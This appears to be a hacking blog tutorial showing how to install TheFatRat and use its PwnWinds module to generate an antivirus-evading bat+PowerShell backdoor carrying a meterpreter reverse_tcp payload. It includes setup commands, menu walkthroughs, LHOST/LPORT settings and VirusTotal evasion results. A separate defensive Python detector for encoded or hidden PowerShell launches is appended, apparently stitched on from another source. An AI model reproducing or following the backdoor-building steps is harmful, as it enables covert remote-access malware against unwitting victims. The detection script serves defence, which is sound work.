Sploitech

How To Create an Executable FUD Backdoor Using TheFatRat

The FatRat

A Massive Exploiting Tool

TheFatRat is an exploitation tool that compiles malware with well-known payloads; the compiled malware can then be executed on Linux, Windows, Mac, and Android. TheFatRat provides an easy way to create backdoors and payloads that can bypass most antivirus software.

Amazing Features!

  • Fully Automating MSFvenom & Metasploit.
  • Local or remote listener Generation.
  • Easily make backdoors by operating system category.
  • Generate payloads in various formats.
  • Backdoors that bypass antivirus.
  • File pumper that you can use to increase the size of your files.
  • The ability to detect the external IP and interface address.
  • Automatically creates AutoRun files for USB / CDROM exploitation.

Installing TheFatRat On Kali Linux:

Steps To Install TheFatRat On Your Kali: 

  • First, clone the files from GitHub.
  • After cloning, enter the directory where the files are located.
  • To run the setup file, type chmod +x {File Name} && ./{File Name}: chmod +x makes the file executable, and ./{File Name} runs it.

    git clone https://github.com/Screetsec/TheFatRat.git
    cd TheFatRat
    chmod +x setup.sh && ./setup.sh

Installation time depends on your internet speed and on which of the packages needed by TheFatRat are not yet installed.

Troubleshoot on TheFatRat:

Use the chk_tools script if you run into problems with setup.sh. It checks whether everything is at the right version to run fatrat and also suggests a solution for any problem it finds.

    cd TheFatRat
    chmod +x chk_tools
    ./chk_tools

If you are still not able to install TheFatRat, please read the full documentation on GitHub (https://github.com/Screetsec/TheFatRat).

Step 1: Creating a FUD Payload Using PwnWinds

Once you have finished installing TheFatRat, you can type fatrat anywhere in a terminal to launch the application. (It should be run with root access; if you are not root, type sudo fatrat.)

    kali@kali:~$ sudo fatrat

It will now check for an internet connection and for the dependencies needed to run the program. If both checks pass, the script will continue.

				
					-       ____
       |    |
       |____|
      _|____|_       _____ _       _____     _   _____     _
       /  ee\_      |_   _| |_ ___|   __|___| |_| __  |___| |_
     .<     __O       | | |   | -_|   __| .'|  _|    -| .'|  _|
    /\ \.-.' \        |_| |_|_|___|__|  |___|_| |__|__|___|_|
   J  \.|'.\/ \
   | |_.|. | | |   [--]   Backdoor Creator for Remote Acces [--]
    \__.' .|-' /   [--]  Created by: Edo Maland (Screetsec) [--]
    L   /|o'--'\   [--]            Version: 1.9.7           [--]
    |  /\/\/\   \  [--]          Codename: Whistle          [--]
    J /      \.__\ [--]   Follow me on Github: @Screetsec   [--]
    J /      \.__\ [--]   Dracos Linux : @dracos-linux.org  [--]
    |/         /   [--]                                     [--]
      \      .'\.  [--]     SELECT AN OPTION TO BEGIN:      [--]
   ____)_/\_(___\. [--] .___________________________________[--]
  (___._/  \_.___)'\_.-----------------------------------------/


       [01]  Create Backdoor with msfvenom
       [02]  Create Fud 100% Backdoor with Fudwin 1.0
       [03]  Create Fud Backdoor with Avoid v1.2
       [04]  Create Fud Backdoor with backdoor-factory [embed]
       [05]  Backdooring Original apk [Instagram, Line,etc]
       [06]  Create Fud Backdoor 1000% with PwnWinds [Excelent]
       [07]  Create Backdoor For Office with Microsploit
       [08]  Trojan Debian Package For Remote Acces [Trodebi]
       [09]  Load/Create auto listeners
       [10]  Jump to msfconsole
       [11]  Searchsploit
       [12]  File Pumper [Increase Your Files Size]
       [13]  Configure Default Lhost & Lport
       [14]  Cleanup
       [15]  Help
       [16]  Credits
       [17]  Exit

┌─[TheFatRat]──[~]─[menu]:
└─────► 6
				
			

In this tutorial, we are going to use PwnWinds for creating an executable backdoor. Now we have to select option number 6.

				
					

        [ Select an Option To Begin >>

        ________                 ___       ______       _________       
        ___  __ \__      __________ |     / /__(_)____________  /_______
        __  /_/ /_ | /| / /_  __ \_ | /| / /__  /__  __ \  __  /__  ___/
        _  ____/__ |/ |/ /_  / / /_ |/ |/ / _  / _  / / / /_/ / _(__  ) 
        /_/     ____/|__/ /_/ /_/____/|__/  /_/  /_/ /_/\__,_/  /____/  

                                  ______    
                               .-        -. 
                              /            \         
                             |,  .-.  .-.  ,|      
                             | )(_ /  \_ )( |
                             |/     /\     \|    
                   (@_       <__    ^^    __>        
              _     ) \_______\__|IIIIII|__/____________________ 
             (_)\@8@8{}<________________________________________> 
                    )_/         \ IIIIII /                    
                   (@            --------                      
                            PwnWind Version  v1.5 
                        Pwned Windows with backdoor
                      Author : Edo Maland (Screetsec)
             Powershell Injection attacks on any Windows Platform                  

        [1]  Create a bat file+Powershell (FUD 100%)
        [2]  Create exe file with C# + Powershell (FUD 100%) 
        [3]  Create exe file with apache + Powershell (FUD 100%)
        [4]  Create exe file with C + Powershell (FUD 98 %)                                                                              
        [5]  Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)                                                                   
        [6]  Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)                                                                   
        [7]  Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)                                                              
        [8]  Create Backdoor with C to dll ( custom dll inject )                                                                         
        [9]  Back to Menu                                                                                                                
                                                                                                                                         
 ┌─[TheFatRat]──[~]─[pwnwind]:                                                                                                           
 └─────► 1                                                                                                                               


   Your local IPV4 address is :                                                                                                          
   Your local IPV6 address is :                                                                                                          
   Your public IP address is : 122.161.77.10                                                                                             
   Your Hostname is : abts-north-dynamic-010.77.161.122.airtelbroadband.in                                                               
                                                                                                                                         
  Set LHOST IP: 192.168.159.129                                                                                                          
                                                                                                                                         
  Set LPORT: 8080                                                                                                                        
                                                                                                                                         
  Please enter the base name for output files :Payload                                                                                   


 
                                                                                                                                         
   +-------------------------------------------+                                                                                         
   | [ 1 ] windows/shell_bind_tcp              |                                                                                         
   | [ 2 ] windows/shell/reverse_tcp           |                                                                                         
   | [ 3 ] windows/meterpreter/reverse_tcp     |                                                                                         
   | [ 4 ] windows/meterpreter/reverse_tcp_dns |                                                                                         
   | [ 5 ] windows/meterpreter/reverse_http    |                                                                                         
   | [ 6 ] windows/meterpreter/reverse_https   |                                                                                         
   +-------------------------------------------+                                                                                         
                                                                                                                                         
   Choose Payload :3                                                                                                                     


[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  ]

 
  Generate Backdoor                                                                                                                      
  +------------++-------------------------++-----------------------+                                                                     
  | Name       ||  Descript               || Your Input                                                                                  
  +------------++-------------------------++-----------------------+                                                                     
  | LHOST      ||  The Listen Address      || 192.168.159.129                                                                             
  | LPORT      ||  The Listen Ports       || 8080                                                                                        
  | OUTPUTNAME ||  The Filename output    || Payload                                                                                     
  | PAYLOAD    ||  Payload To Be Used     || windows/meterpreter/reverse_tcp                                                             
  +------------++-------------------------++-----------------------+                                                                     
                                                                                                                                         
                                                                                                                                         
                                                                                                                                         
                                                                                                                                         
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++    ]

Backdoor Saved To : /home/kali//Payload.bat                                                                                              
                                                                                                                                         
  Press [ENTER] to continue .........                              



				
			

We will use the bat file + PowerShell option because it is less detectable by antivirus software, so select option number 1. You will then be asked to enter your LHOST IP; it is displayed next to "Your local IPV4 address", so just copy and paste that IP. Next you will be asked to specify the LPORT. I am using 8080 as my LPORT because many web servers use port 8080. After these settings you will be asked for the base name of your bat file; it can be anything, and I have used Payload. You will then be asked to select the payload to use in your file; I am using option number 3. Press Enter and your file will be generated and saved to the location you specified when installing TheFatRat. If you want to know how to hack using this file check out our article on:

Conclusion

When the file was scanned with VirusTotal, only 23 out of 60 AV products detected it as malicious. The file is not going to work against the following AV software, which flagged it:

  • Microsoft
  • Avast
  • McAfee
  • BitDefender
  • AVG
  • Comodo

Many other antivirus products also flagged this file as malicious.
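Because a large share of engines did not flag the file, defenders typically also inspect how a script launches PowerShell rather than relying on signatures alone. The Python triage below is an added example, not code from this article or from TheFatRat; the page does not show the contents of the generated .bat, so the switches it looks for (abbreviated -EncodedCommand, -WindowStyle hidden, -NoProfile) are generic indicators assumed for illustration, and the sample input is constructed with benign content.

```python
import base64
import re

# Parameter -> (shortest prefix accepted here, extra aliases). powershell.exe
# takes abbreviated switches, so full-name matching misses real command lines.
PARAMS = {
    "encodedcommand": (1, {"ec"}),
    "windowstyle": (1, set()),
    "noprofile": (3, set()),
}
# A switch, plus the following word when that word is not another switch.
TOKEN = re.compile(r"(?<!\S)-([A-Za-z]+)(?:\s+([^\s-]\S*))?")

def classify(switch):
    """Map an abbreviated switch to its full parameter name, or None."""
    s = switch.lower()
    for name, (min_len, aliases) in PARAMS.items():
        if s in aliases or (len(s) >= min_len and name.startswith(s)):
            return name
    return None

def analyze(script_text):
    """Return (findings, decoded_commands) for the text of one script."""
    findings, decoded = set(), []
    for line in script_text.splitlines():
        if not re.search(r"\bpowershell(\.exe)?\b", line, re.I):
            continue
        findings.add("launches_powershell")
        for switch, value in TOKEN.findall(line):
            name = classify(switch)
            if name == "encodedcommand" and value:
                findings.add("encoded_command")
                try:  # the argument is Base64 over UTF-16LE text
                    raw = base64.b64decode(value, validate=True)
                    decoded.append(raw.decode("utf-16-le"))
                except (ValueError, UnicodeDecodeError):
                    findings.add("undecodable_blob")
            elif name == "windowstyle" and value.lower() in ("hidden", "1"):
                findings.add("hidden_window")  # 1 is the numeric value of Hidden
            elif name == "noprofile":
                findings.add("noprofile")
    return findings, decoded

# Constructed sample with benign content (not output of TheFatRat).
_BLOB = base64.b64encode("Write-Output 'hello'".encode("utf-16-le")).decode()
SAMPLE_BAT = f"@echo off\r\npowershell.exe -nop -w hidden -e {_BLOB}\r\n"

if __name__ == "__main__":
    print(analyze(SAMPLE_BAT))
```

The decoded command text is what an analyst reviews next; an encoded command combined with a hidden window is a reasonable threshold for escalation.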
